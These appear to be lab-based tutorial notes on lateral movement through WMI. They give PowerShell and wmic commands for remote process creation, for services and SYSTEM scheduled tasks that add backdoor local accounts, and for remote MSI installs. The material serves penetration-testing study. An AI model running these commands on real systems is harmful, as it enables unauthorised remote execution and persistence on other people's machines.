General
==(Similar to Spawning Processes Remotely)==
"Moving Laterally Using WMI" is a technique used to access and control other computers on a network through a technology called WMI (Windows Management Instrumentation). This technique allows you to connect to other computers using PowerShell, create and manage processes, services and scheduled tasks remotely, as well as installing MSI packages.
First, you need to connect to WMI from PowerShell, this will allow you to access the WMI on the remote computer. Once connected, you can use the WMI to remotely create processes on the remote computer, this is called "Remote Process Creation Using WMI".
You can also use WMI to create services remotely, this means you can start and stop services on the remote computer without having to physically access it. This is called "Creating Services Remotely with WMI".
Another thing you can do with WMI is creating scheduled tasks remotely, this means you can create tasks that will run automatically on the remote computer at a specific time. This is called "Creating Scheduled Tasks Remotely with WMI".
Finally, you can use WMI to install MSI packages on the remote computer, this means you can install software without having to physically access the computer. This is called "Installing MSI packages through WMI".
- Why Using WMI rather then PSexec, SC.exe or a simple reverse shell?
- WMI is built into Windows, so it does not require any additional software to be installed. This can be useful in situations where you are not able to install additional tools on the target system.
- WMI allows for remote management of processes, services, and other aspects of the system, which can be useful for managing multiple systems at once.
- WMI can be used with PowerShell, which provides a rich set of commands for managing and automating Windows systems. This can make it easier to create scripts and automate tasks.
- WMI can provide more fine-grained control over processes. For example, the 'Create' method of the Win32_Process class allows passing more arguments than PSexec or SC, like priority level, working directory, etc.
- WMI can be used to create a persistance connection to the target machine using scheduled task
Commands
Connecting to WMI
Before being able to connect to WMI using Powershell commands, we need to create a PSCredential object with our user and password. This object will be stored in the $credential variable and utilised throughout the techniques on this task:
$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
We then proceed to establish a WMI session using either of the following protocols:
- DCOM:Â RPC over IP will be used for connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCP, just as explained when using sc.exe.
- Wsman:Â WinRM will be used for connecting to WMI. This protocol uses ports 5985/TCP (WinRMÂ HTTP) or 5986/TCP (WinRM HTTPS).
To establish a WMI session from Powershell, we can use the following commands and store the session on the $Session variable, which we will use throughout the room on the different techniques:
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
The New-CimSessionOption
 cmdlet is used to configure the connection options for the WMI session, including the connection protocol. The options and credentials are then passed to the New-CimSession
 cmdlet to establish a session against a remote host.
Remote Process Creation Using WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships:Â Administrators
We can remotely spawn a process from Powershell by leveraging Windows Management Instrumentation (WMI), sending a WMI request to the Win32_Process class to spawn the process under the session we created before:
$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
Notice that WMI won't allow you to see the output of any command but will indeed create the required process silently.
On legacy systems, the same can be done using wmic from the command prompt:
wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe"
Creating Services Remotely with WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRMÂ HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships:Â Administrators
We can create services with WMI through Powershell. To create a service called THMService2, we can use the following command:
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "THMService2";
DisplayName = "THMService2";
PathName = "net user munra2 Pass123 /add"; # Your payload
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
And then, we can get a handle on the service and start it with the following commands:
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
Finally, we can stop and delete the service with the following commands:
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
Creating Scheduled Tasks Remotely with WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRMÂ HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships:Â Administrators
We can create and execute scheduled tasks by using some cmdlets available in Windows default installations:
# Payload must be split in Command and Args
$Command = "cmd.exe"
$Args = "/c net user munra22 aSdf1234 /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"
Start-ScheduledTask -CimSession $Session -TaskName "THMtask2"
To delete the scheduled task after it has been used, we can use the following command:
Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2"
Installing MSI packages through WMI
- Ports:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP (WinRMÂ HTTP) or 5986/TCP (WinRM HTTPS)
- Required Group Memberships:Â Administrators
MSI is a file format used for installers. If we can copy an MSI package to the target system, we can then use WMI to attempt to install it for us. The file can be copied in any way available to the attacker. Once the MSI file is in the target system, we can attempt to install it by invoking the Win32_Product class through WMI:
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}
We can achieve the same by us using wmic in legacy systems:
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi